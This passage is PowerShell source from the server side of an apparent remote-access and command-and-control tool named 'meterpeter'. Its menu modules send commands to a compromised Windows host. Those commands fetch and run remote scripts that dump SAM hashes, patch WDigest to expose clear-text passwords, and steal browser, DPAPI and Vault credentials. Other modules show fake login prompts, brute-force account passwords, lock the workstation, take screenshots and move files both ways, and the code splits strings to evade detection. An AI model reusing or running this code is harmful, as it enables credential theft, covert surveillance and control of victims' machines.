\"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){cd `$Env:TMP;iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Sam/Invoke-Dump.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Dump.ps1`\"|Unblock-File;Import-Module -Name `\".\\Invoke-Dump.ps1`\" -Force;Invoke-Dump;Remove-Item -Path `\"`$Env:TMP\\Invoke-Dump.ps1`\" -Force}Else{echo `\" `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n }\r\n If($pass_choise -ieq \"WDigest\")\r\n {\r\n write-host \" * WDigest Credential caching [memory]`n\" -ForegroundColor Green\r\n\r\n write-host \" Description:\" -ForegroundColor DarkYellow\r\n write-host \" This module patches WDigest [memory] so that m[i]mika[t]z\"\r\n write-host \" can retrieve any clear-text credentials present in memory.`n\"\r\n\r\n write-host \" Prompt target user for credential: 'yes' pauses module\"\r\n write-host \" execution while waiting for target user credential input,\"\r\n write-host \" only then it resumes execution and print results onscreen`n\"\r\n\r\n write-host \" - Prompt target user for credential? (yes|no): \" -ForegroundColor Red -NoNewLine\r\n $PromptBox = Read-Host\r\n\r\n write-host \" => module takes aprox 2 minuts to finish is work.\" -ForegroundColor Yellow\r\n If(-not($PromptBox) -or ($PromptBox -iMatch '^(no|n)$'))\r\n {\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/DeviceGuard/Invoke-WDigest.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WDigest.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -banner 'false' -wdigest 'true' -manycats;Remove-Item -Path `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -Force\";\r\n }\r\n Else\r\n {\r\n $MyRunes = \"-r\" + \"una\" + \"s\" -join ''\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/DeviceGuard/Invoke-WDigest.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WDigest.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -banner 'false' -wdigest 'true' -manycats $MyRunes;Remove-Item -Path `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -Force\";\r\n }\r\n }\r\n If($pass_choise -ieq \"Browser\")\r\n {\r\n write-host \" * WebBrowser cred`ential dump.\" -ForegroundColor Green\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/DeviceGuard/Invoke-WDigest.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WDigest.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -banner 'false' -wdigest 'false' -browsercreds;Remove-Item -Path `\"`$Env:TMP\\Invoke-WDigest.ps1`\" -Force\";\r\n }\r\n If($pass_choise -ieq \"Dpapi\")\r\n {\r\n write-host \" * Dump \" -ForegroundColor Green -NoNewline\r\n write-host \"$Remote_Host\" -ForegroundColor Red -NoNewline\r\n write-host \" DPAPI secrets.\" -ForegroundColor Green\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Invoke-VaultCmd.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\" -action `\"DPAPI`\" -banner `\"false`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\" -Force\";\r\n }\r\n If($pass_choise -ieq \"Vault\")\r\n {\r\n write-host \" * Dumping PasswordVault credentials.\" -ForegroundColor Green\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Invoke-VaultCmd.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\" -action `\"dump`\" -banner `\"false`\" -secure;Remove-Item -Path `\"`$Env:TMP\\Invoke-VaultCmd.ps1`\" -Force\"\r\n }\r\n If($pass_choise -ieq \"File\")\r\n {\r\n write-host \" * Search for stored credentials inside files.\" -ForegroundColor Green\r\n write-host \" Leave input fields black to use default settings.\" -ForegroundColor DarkYellow\r\n\r\n write-host \" - Directory to search recursive (`$Env:USERPROFILE): \" -ForeGroundColor Red -NoNewLine\r\n $Recursive_search = Read-Host\r\n\r\n If(-not($Recursive_search))\r\n {\r\n $Recursive_search = \"`$Env:USERPROFILE\"\r\n write-host \" => Error: wrong input, default to $Recursive_search\" -ForegroundColor Red\r\n }\r\n\r\n write-host \" - String or Regex command to search (password=) : \" -NoNewLine\r\n $String = Read-Host\r\n If(-not($String))\r\n {\r\n write-host \" => Error: wrong input, using cmdlet default Regex\" -ForegroundColor Red\r\n $String = \"(^(\\s+U|U)ser.{0,6}(=|:).[^$]{0,22}$)|(^(\\s+p|\\s+cp|cp|p)ass.{0,6}(=|:).{0,22}$)|(^(\\s+p|p)wd.{0,2}(=|:).{0,22}$)|(log(i|o)n.{0,2}(=|:).[^$]{0,22}$)\"\r\n }\r\n\r\n write-host \" - Stop searching after found xxx results (100) : \" -NoNewLine\r\n $StopAt = Read-Host\r\n If(-not($StopAt))\r\n {\r\n $StopAt = \"15\"\r\n write-host \" => Error: wrong input, default to 15 max results.\" -ForegroundColor Red\r\n }\r\n\r\n write-host \" - Display detailed (verbose) scan reports? (y|n) : \" -NoNewLine\r\n $VerboseMode = Read-Host\r\n write-host \" => Please wait until module finishes working.\" -ForegroundColor DarkYellow\r\n\r\n If(-not($VerboseMode))\r\n {\r\n $VerboseMode = \"false\"\r\n write-host \" => Error: wrong input, default verbose to false..\" -ForegroundColor Red\r\n }\r\n ElseIf(($VerboseMode -iMatch '^(n|no)$'))\r\n {\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Find-Strings.ps1`\" -OutFile `\"`$Env:TMP\\Find-Strings.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Find-Strings.ps1`\" -Path `\"$Recursive_search`\" -String `\"$String`\" -StopAt `\"$StopAt`\";Remove-Item -Path `\"`$Env:TMP\\Find-Strings.ps1`\" -Force\";\r\n }\r\n Else\r\n {\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Find-Strings.ps1`\" -OutFile `\"`$Env:TMP\\Find-Strings.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\Find-Strings.ps1`\" -Path `\"$Recursive_search`\" -String `\"$String`\" -StopAt `\"$StopAt`\" -verb -limmit `\"1`\";Remove-Item -Path `\"`$Env:TMP\\Find-Strings.ps1`\" -Force\";\r\n }\r\n }\r\n If($pass_choise -ieq \"Return\" -or $pass_choise -ieq \"cls\" -or $pass_choise -ieq \"Modules\" -or $pass_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $pass_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"LockPC\" -or $choise -ieq \"lock\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" This module allow users to lock target pc\"\r\n write-host \" Remark: This function silent restarts explorer.\" -ForeGroundColor yellow;\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" start lock target pc UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:Lock> \" -NoNewline -ForeGroundColor Green;\r\n $Lock_choise = Read-Host;\r\n If($Lock_choise -ieq \"start\")\r\n {\r\n $Ob = \"rund\" + \"ll32.exe user32\" + \".dll, LockWor\" + \"kStation\" -join ''\r\n write-host \" * Lock Remote WorkStation.\" -ForegroundColor Green;write-host \"`n`n\";\r\n $Command = \"$Ob;echo `\" [i] Remote-Host WorkStation Locked ..`\" `> prank.txt;Get-content prank.txt;Remove-Item prank.txt -Force\";\r\n }\r\n If($Lock_choise -ieq \"Return\" -or $Lock_choise -ieq \"cls\" -or $Lock_choise -ieq \"Modules\" -or $Lock_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Lock_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"PhishCred\" -or $choise -ieq \"Creds\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" This module spawns a remote 'Prompt-For-Credential' dialogBox\";\r\n write-host \" in the hope that target user enters is credentials to leak them\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Start Phish for remote creds UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:Creds> \" -NoNewline -ForeGroundColor Green;\r\n $cred_choise = Read-Host;\r\n If($cred_choise -ieq \"Start\")\r\n {\r\n write-host \" * Phish`ing for remote credentials (logon)\" -ForegroundColor Green;Write-Host \"\"\r\n $Command = \"cd `$Env:TMP;`$GetEnvironement = [System.Environment]::OSVersion.Version.Major;If(-not(`$GetEnvironement -match '^(10|11)$')){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/CredsPhish.ps1`\" -OutFile `\"`$Env:TMP\\CredsPhish.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-File `$Env:TMP\\CredsPhish.ps1 -PhishCreds start`\" -Wait;Get-Content -Path `\"`$Env:TMP\\creds.log`\";Remove-Item -Path `\"`$Env:TMP\\creds.log`\" -Force;Remove-Item -Path `\"`$Env:TMP\\CredsPhish.ps1`\" -Force}Else{iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/PhishCreds.ps1`\" -OutFile `\"`$Env:TMP\\PhishCreds.ps1`\"|Unblock-File;powershell -file PhishCreds.ps1;Remove-Item PhishCreds.ps1 -force}\"\r\n }\r\n If($cred_choise -ieq \"Return\" -or $cred_choise -ieq \"return\" -or $cred_choise -ieq \"cls\" -or $cred_choise -ieq \"Modules\" -or $cred_choise -ieq \"modules\" -or $cred_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n }\r\n $cred_choise = $Null;\r\n }\r\n If($choise -ieq \"BruteAcc\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" Bruteforcing user account password using dicionary attack.\"\r\n write-host \" Remark: Default dicionary contains 59189 credential entrys.\" -ForegroundColor Yellow\r\n write-host \" Remark: If you wish to use your own dicionary, then store\" -ForegroundColor Yellow\r\n write-host \" it on target %TMP% directory under the name of passw.txt\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Start Bruteforcing user account UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Post:BruteAcc> \" -NoNewline -ForeGroundColor Green;\r\n $Brute_choise = Read-Host;\r\n If($Brute_choise -ieq \"Start\")\r\n {\r\n Write-Host \" - Input Account Name:\" -ForeGroundColor Red -NoNewline\r\n $UserAccountName = Read-Host\r\n Write-Host \" * Bruteforcing user account.\" -ForegroundColor Green\r\n If(-not($UserAccountName) -or $UserAccountName -eq $null){$UserAccountName = \"`$Env:USERNAME\"}\r\n\r\n Write-Host \"\"\r\n #Build output DataTable!\r\n $BruteTime = Get-Date -Format \"HH:mm:ss\"\r\n $BruteTable = New-Object System.Data.DataTable\r\n $BruteTable.Columns.Add(\"UserName\")|Out-Null\r\n $BruteTable.Columns.Add(\"StartTime\")|Out-Null\r\n $BruteTable.Columns.Add(\"Dicionary\")|Out-Null\r\n\r\n #Adding values to output DataTable!\r\n $BruteTable.Rows.Add(\"$UserAccountName\",\"$BruteTime\",\"%TMP%\\passw.txt\")|Out-Null\r\n\r\n #Diplay output DataTable!\r\n $BruteTable | Format-Table -AutoSize | Out-String -Stream | ForEach-Object {\r\n $stringformat = If($_ -Match '^(UserName)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n Else\r\n {\r\n @{}\r\n }\r\n Write-Host @stringformat $_\r\n }\r\n\r\n #Run command\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/CredsPhish.ps1`\" -OutFile `\"`$Env:TMP\\CredsPhish.ps1`\";powershell -W 1 -File `$Env:TMP\\CredsPhish.ps1 -PhishCreds Brute -Dicionary `$Env:TMP\\passw.txt -UserAccount $UserAccountName;Remove-Item -Path `$Env:TMP\\CredsPhish.ps1 -Force\"\r\n }\r\n If($Brute_choise -ieq \"Return\" -or $Brute_choise -ieq \"cls\" -or $Brute_choise -ieq \"modules\" -or $Brute_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Brute_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Return\" -or $choice -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"Modules\" -or $choise -ieq \"modules\" -or $choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n }\r\n $choise = $Null;\r\n $set_time = $Null;\r\n $mace_path = $Null;\r\n }\r\n\r\n If($Command -ieq \"Download\")\r\n {\r\n write-host \"`n`n Remark:\" -ForegroundColor Yellow;\r\n write-host \" Allways input absoluct path of the file to be downloaded.\";\r\n write-host \" Avoid downloading LARGE\\HUGE files with tcp connections.\" -ForegroundColor Yellow;\r\n write-host \" The file will be stored in meterpeter C2 working directory.\" -ForegroundColor Yellow;\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Start Download from rhost to lhost UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Download> \" -NoNewline -ForeGroundColor Green;\r\n $Download_choise = Read-Host;\r\n If($Download_choise -ieq \"Start\")\r\n {\r\n Write-Host \" - Remote File Path: \" -ForeGroundColor Red -NoNewline;\r\n $File = Read-Host;\r\n\r\n If(!(\"$File\" -like \"* *\") -and !([string]::IsNullOrEmpty($File)))\r\n {\r\n $Command = \"`$1=`\"#`\";If(!(`\"`$1`\" -like `\"*\\*`\") -and !(`\"`$1`\" -like `\"*/*`\")){`$1=`\"`$pwd\\`$1`\"};If(([System.IO.File]::Exists(`\"`$1`\"))){[io.file]::ReadAllBytes(`\"`$1`\") -join ','}\";\r\n $Command = ChkDskInternalFuncio(Char_Obf($Command));\r\n $Command = $Command -replace \"#\",\"$File\";\r\n $File = $File.Split('\\')[-1];\r\n $File = $File.Split('/')[-1];\r\n $File = \"$IPATH$File\";\r\n $Save = $True;\r\n } Else {\r\n Write-Host \"`n\";\r\n $File = $Null;\r\n $Command = $Null;\r\n }\r\n }\r\n If($Download_choise -ieq \"Return\" -or $Download_choise -ieq \"cls\" -or $Download_choise -ieq \"Modules\" -or $Download_choise -ieq \"clear\")\r\n {\r\n $Command = $Null;\r\n $Download_choise = $Null;\r\n }\r\n }\r\n\r\n If($Command -ieq \"Upload\")\r\n {\r\n write-host \"`n`n Remark:\" -ForegroundColor Yellow;\r\n write-host \" Allways input absoluct path of the file to be uploaded.\";\r\n write-host \" Avoid uploading LARGE\\HUGE files with tcp connections.\" -ForegroundColor Yellow;\r\n write-host \" The file will be uploaded to Client working directory.\" -ForegroundColor Yellow;\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Start Upload from lhost to rhost UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Upload> \" -NoNewline -ForeGroundColor Green;\r\n $Upload_choise = Read-Host;\r\n If($Upload_choise -ieq \"Start\")\r\n {\r\n Write-Host \" - Local File Path: \" -ForeGroundColor Red -NoNewline;\r\n $File = Read-Host;\r\n\r\n If(!(\"$File\" -like \"* *\") -and !([string]::IsNullOrEmpty($File)))\r\n {\r\n\r\n If(!(\"$File\" -like \"*\\*\") -and !(\"$File\" -like \"*/*\"))\r\n {\r\n $File = \"$IPATH$File\";\r\n }\r\n\r\n If(([System.IO.File]::Exists(\"$File\")))\r\n {\r\n $FileBytes = [io.file]::ReadAllBytes(\"$File\") -join ',';\r\n $FileBytes = \"($FileBytes)\";\r\n $File = $File.Split('\\')[-1];\r\n $File = $File.Split('/')[-1];\r\n $Command = \"`$1=`\"`$pwd\\#`\";`$2=@;If(!([System.IO.File]::Exists(`\"`$1`\"))){[System.IO.File]::WriteAllBytes(`\"`$1`\",`$2);`\"`$1`\"}\";\r\n $Command = ChkDskInternalFuncio(Char_Obf($Command));\r\n $Command = $Command -replace \"#\",\"$File\";\r\n $Command = $Command -replace \"@\",\"$FileBytes\";\r\n $Upload = $True;\r\n } Else {\r\n Write-Host \"`n`n Status File Path\" -ForeGroundColor green;\r\n Write-Host \" ------ ---------\";\r\n Write-Host \" Failed File Missing: $File`n\" -ForeGroundColor red;\r\n $Command = $Null;\r\n }\r\n } Else {\r\n Write-Host \"`n\";\r\n $Command = $Null;\r\n }\r\n $File = $Null;\r\n }\r\n If($Upload_choise -ieq \"Return\" -or $Upload_choise -ieq \"cls\" -or $Upload_choise -ieq \"Modules\" -or $Upload_choise -ieq \"clear\")\r\n {\r\n $Command = $Null;\r\n $Upload_choise = $Null;\r\n }\r\n }\r\n\r\n If($Command -ieq \"Screenshot\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" This module can be used to take desktop screenshot(s)\";\r\n write-host \" Remark: Snapshot auto-downloads the screenshots from 'RHOST'\" -ForegroundColor Yellow;\r\n write-host \" Remark: SpyScreen captures in background and stores on %TMP%\" -ForegroundColor Yellow;\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Snapshot Capture one desktop_screenshot UserLand\";\r\n write-host \" SpyScreen Capture multiple screenshots UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Screenshots> \" -NoNewline -ForeGroundColor Green;\r\n $choise_two = Read-Host;\r\n If($choise_two -ieq \"Snapshot\")\r\n {\r\n $Obf = \"Ad\" + \"d-Ty\" + \"pe -Ass\" + \"embl\" + \"yName\" -join ''\r\n $File = -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})\r\n Write-Host \" * Screenshot File:'\" -ForegroundColor Green -NoNewline\r\n Write-Host \"$File.png\" -ForegroundColor DarkGray -NoNewline\r\n Write-Host \"'\" -ForegroundColor Green\r\n write-host \" => Remark: wait for module to finish..\" -ForegroundColor Red\r\n \r\n $Command = \"`$FilePath=`\"`$Env:TMP\\#`\";$Obf System.Windows.Forms;`$Microsof=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);`$Catrapilar=[System.Drawing.Graphics]::FromImage(`$Microsof);`$Catrapilar.CopyFromScreen((New-Object System.Drawing.Point(0,0)),(New-Object System.Drawing.Point(0,0)),`$Microsof.Size);`$Catrapilar.Dispose();Start-Sleep -Milliseconds 200;`$Microsof.Save(`\"`$FilePath`\");If(([System.IO.File]::Exists(`\"`$FilePath`\"))){[io.file]::ReadAllBytes(`\"`$FilePath`\") -join ',';Remove-Item -Path `\"`$FilePath`\" -Force}\";\r\n $Command = $Command -replace \"#\",\"$File\";\r\n $File = \"$pwd\\$File.png\";\r\n $Save = $True; \r\n }\r\n If($choise_two -ieq \"SpyScreen\")\r\n {\r\n [int]$Inbetween = 1\r\n Write-Host \" - Take how many captures: \" -NoNewline;\r\n [int]$Captures = Read-Host;\r\n \r\n If(-not($Captures) -or $Captures -lt 1)\r\n {\r\n [int]$Captures = 1\r\n }\r\n ElseIf($Captures -gt 1)\r\n {\r\n Write-Host \" - Time between captures : \" -NoNewline;\r\n [int]$Inbetween = Read-Host;\r\n }\r\n\r\n If($Captures -gt 3 -or $Inbetween -gt 5)\r\n {\r\n $TotalSpyTime = $Captures * $Inbetween\r\n write-host \" *\" -ForegroundColor Green -NoNewline;\r\n write-host \" Background Screenshot Execution.`n`n\" -ForegroundColor Green;\r\n\r\n ## Create Data Table for output\r\n $mytable = New-Object System.Data.DataTable\r\n $mytable.Columns.Add(\"Captures\")|Out-Null\r\n $mytable.Columns.Add(\"DelayTime\")|Out-Null\r\n $mytable.Columns.Add(\"TotalTime\")|Out-Null\r\n $mytable.Columns.Add(\"FileStorage\")|Out-Null\r\n $mytable.Rows.Add(\"$Captures\",\r\n \"$Inbetween (sec)\",\r\n \"$TotalSpyTime (sec)\",\r\n \"%tmp%\\Meterpeter.zip\")|Out-Null\r\n\r\n ## Display Data Table\r\n $mytable | Format-Table -AutoSize\r\n $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Screenshot.ps1 -OutFile `$Env:TMP\\Screenshot.ps1|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-File $Env:TMP\\Screenshot.ps1 -Screenshot $Captures -Delay $Inbetween`\"\" \r\n }\r\n Else\r\n {\r\n #Run command\r\n $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Screenshot.ps1 -OutFile `$Env:TMP\\Screenshot.ps1|Out-Null;powershell -File `\"`$Env:TMP\\Screenshot.ps1`\" -Screenshot $Captures -Delay $Inbetween\"\r\n }\r\n }\r\n If($choise_two -ieq \"Return\" -or $choise_two -ieq \"cls\" -or $choise_two -ieq \"Modules\" -or $choise_two -ieq \"clear\")\r\n {\r\n $Command = $Null;\r\n $choise_two = $Null;\r\n }\r\n }\r\n\r\n\r\n If(!([string]::IsNullOrEmpty($Command)))\r\n {\r\n If(!($Command.length % $Bytes.count))\r\n {\r\n $Command += \" \";\r\n }\r\n\r\n $SendByte = ([text.encoding]::ASCII).GetBytes($Command);\r\n\r\n Try {\r\n\r\n $Stream.Write($SendByte,0,$SendByte.length);\r\n $Stream.Flush();\r\n }\r\n\r\n Catch {\r\n\r\n Write-Host \"`n [x] Connection Lost with $Remote_Host !\" -ForegroundColor Red -BackGroundColor white;\r\n $webroot = Test-Path -Path \"$env:LocalAppData\\webroot\\\";If($webroot -ieq $True){cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\"};\r\n Start-Sleep -Seconds 4;\r\n $Socket.Stop();\r\n $Client.Close();\r\n $Stream.Dispose();\r\n Exit;\r\n }\r\n $WaitData = $True;\r\n }\r\n\r\n If($Command -ieq \"Exit\")\r\n {\r\n write-Host \"`n\";\r\n Write-Host \"[x] Closing Connection with $Remote_Host!\" -ForegroundColor Red -BackGroundColor white;\r\n $check = Test-Path -Path \"$env:LocalAppData\\webroot\\\";\r\n If($check -ieq $True)\r\n {\r\n Start-Sleep -Seconds 2;\r\n write-host \"[i] Deleted: '$env:LocalAppData\\webroot\\'\" -ForegroundColor Yellow;\r\n cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\";\r\n }\r\n\r\n If(Test-Path -Path \"${IPATH}${payload_name}.ps1\" -EA SilentlyContinue)\r\n {\r\n Remove-Item -Path \"${IPATH}${payload_name}.ps1\" -ErrorAction SilentlyContinue -Force\r\n write-host \"[i] Deleted: '${IPATH}${payload_name}.ps1'\" -ForegroundColor Yellow\r\n }\r\n\r\n Start-Sleep -Seconds 3\r\n\r\n Clear-Host\r\n write-host $EndBanner\r\n write-host \" * GitHub: https://github.com/r00t-3xp10it/meterpeter *`n\" -ForegroundColor DarkYellow\r\n\r\n $Socket.Stop();\r\n $Client.Close();\r\n $Stream.Dispose();\r\n Exit;\r\n }\r\n\r\n If($Command -ieq \"Clear\" -or $Command -ieq \"Cls\" -or $Command -ieq \"Clear-Host\" -or $Command -ieq \"return\" -or $Command -ieq \"modules\")\r\n {\r\n Clear-Host;\r\n #Write-Host \"`n$Modules\";\r\n }\r\n $Command = $Null;\r\n }\r\n\r\n If($WaitData)\r\n {\r\n While(!($Stream.DataAvailable))\r\n {\r\n Start-Sleep -Milliseconds 1;\r\n }\r\n\r\n If($Stream.DataAvailable)\r\n {\r\n While($Stream.DataAvailable -or $Read -eq $Bytes.count)\r\n {\r\n Try {\r\n\r\n If(!($Stream.DataAvailable))\r\n {\r\n $Temp = 0;\r\n\r\n While(!($Stream.DataAvailable) -and $Temp -lt 1000)\r\n {\r\n Start-Sleep -Milliseconds 1;\r\n $Temp++;\r\n }\r\n\r\n If(!($Stream.DataAvailable))\r\n {\r\n Write-Host \"`n [x] Connection Lost with $Remote_Host!\" -ForegroundColor Red -BackGroundColor white;\r\n $webroot = Test-Path -Path \"$env:LocalAppData\\webroot\\\";If($webroot -ieq $True){cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\"};\r\n Start-Sleep -Seconds 5;\r\n $Socket.Stop();\r\n $Client.Close();\r\n $Stream.Dispose();\r\n Exit;\r\n }\r\n }\r\n\r\n $Read = $Stream.Read($Bytes,0,$Bytes.length);\r\n $OutPut += (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$Read);\r\n }\r\n\r\n Catch {\r\n\r\n Write-Host \"`n [x] Connection Lost with $Remote_Host!\" -ForegroundColor Red -BackGroundColor white;\r\n $webroot = Test-Path -Path \"$env:LocalAppData\\webroot\\\";If($webroot -ieq $True){cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\"};\r\n Start-Sleep -Seconds 5;\r\n $Socket.Stop();\r\n $Client.Close();\r\n $Stream.Dispose();\r\n Exit;\r\n }\r\n }\r\n\r\n If(!($Info))\r\n {\r\n $Info = \"$OutPut\";\r\n }\r\n\r\n If($OutPut -ne \" \" -and !($Save) -and !($Upload))\r\n {\r\n Write-Host \"`n$OutPut\";\r\n }\r\n\r\n If($Save)\r\n {\r\n If($OutPut -ne \" \")\r\n {\r\n If(!([System.IO.File]::Exists(\"$File\")))\r\n {\r\n $FileBytes = \"$OutPut\"|&('Sex' -replace 'S','I')\r\n [System.IO.File]::WriteAllBytes(\"$File\",$FileBytes);\r\n Write-Host \"`n`n Status File Path\" -ForeGroundColor green;\r\n Write-Host \" ------ ---------\";\r\n Write-Host \" saved $File`n\";\r\n $Command = $Null;\r\n } Else {\r\n Write-Host \"`n`n Status File Path\" -ForeGroundColor green;\r\n Write-Host \" ------ ---------\";\r\n Write-Host \" Failed $File (Already Exists)`n\" -ForegroundColor Red;\r\n $Command = $Null;\r\n }\r\n } Else {\r\n Write-Host \"`n`n Status File Path\" -ForeGroundColor green;\r\n Write-Host \" ------ ---------\";\r\n Write-Host \" Failed File Missing`n\" -ForegroundColor Red;\r\n $Command = $Null;\r\n }\r\n $File = $Null;\r\n $Save = $False;\r\n $Command = $Null; \r\n }\r\n\r\n If($Upload)\r\n {\r\n If($OutPut -ne \" \")\r\n {\r\n If($Cam_set -ieq \"True\")\r\n {\r\n write-host \"`n`n CommandCam syntax\" -ForeGroundColor Green;\r\n write-host \" -----------------\";\r\n Write-Host \" :meterpeter> .\\CommandCam.exe /devlist`n\";\r\n $Cam_set = \"False\";\r\n\r\n }ElseIf($SluiEOP -ieq \"True\"){\r\n \r\n cd mimiRatz\r\n ## Revert SluiEOP [<MakeItPersistence>] to defalt [<False>]\r\n $CheckValue = Get-Content SluiEOP.ps1|Select-String \"MakeItPersistence =\"\r\n If($CheckValue -match 'True'){((Get-Content -Path SluiEOP.ps1 -Raw) -Replace \"MakeItPersistence = `\"True`\"\",\"MakeItPersistence = `\"False`\"\")|Set-Content -Path SluiEOP.ps1 -Force}\r\n cd ..\r\n\r\n Write-Host \"`n`n Status Remote Path\" -ForeGroundColor green;\r\n write-host \" ------ -----------\"\r\n Write-Host \" Saved $OutPut`n\"\r\n $SluiEOP = \"False\"\r\n\r\n }ElseIf($COMEOP -ieq \"True\"){\r\n\r\n cd mimiRatz\r\n ## Revert CompDefault [<MakeItPersistence>] to defalt [<False>]\r\n $CheckValue = Get-Content CompDefault.ps1|Select-String \"MakeItPersistence =\"\r\n If($CheckValue -match 'True'){((Get-Content -Path CompDefault.ps1 -Raw) -Replace \"MakeItPersistence = `\"True`\"\",\"MakeItPersistence = `\"False`\"\")|Set-Content -Path CompDefault.ps1 -Force}\r\n cd ..\r\n\r\n Write-Host \"`n`n Status Remote Path\" -ForeGroundColor green;\r\n write-host \" ------ -----------\"\r\n Write-Host \" Saved $OutPut`n\"\r\n $COMEOP = \"False\"\r\n\r\n }else{\r\n $OutPut = $OutPut -replace \"`n\",\"\";\r\n If($OutPut -match \"GetBrowsers.ps1\"){\r\n $sanitize = $OutPut -replace 'GetBrowsers.ps1','GetBrowsers.ps1 '\r\n $OutPut = $sanitize.split(' ')[0] # Get only the 1º upload path\r\n }\r\n Write-Host \"`n`n Status Remote Path\" -ForeGroundColor green;\r\n Write-Host \" ------ -----------\";\r\n Write-Host \" saved $OutPut`n\";\r\n }\r\n If($Tripflop -ieq \"True\")\r\n {\r\n Write-Host \" execute :meterpeter> Get-Help ./GetBrowsers.ps1 -full`n\" -ForeGroundColor Yellow;\r\n $Tripflop = \"False\";\r\n 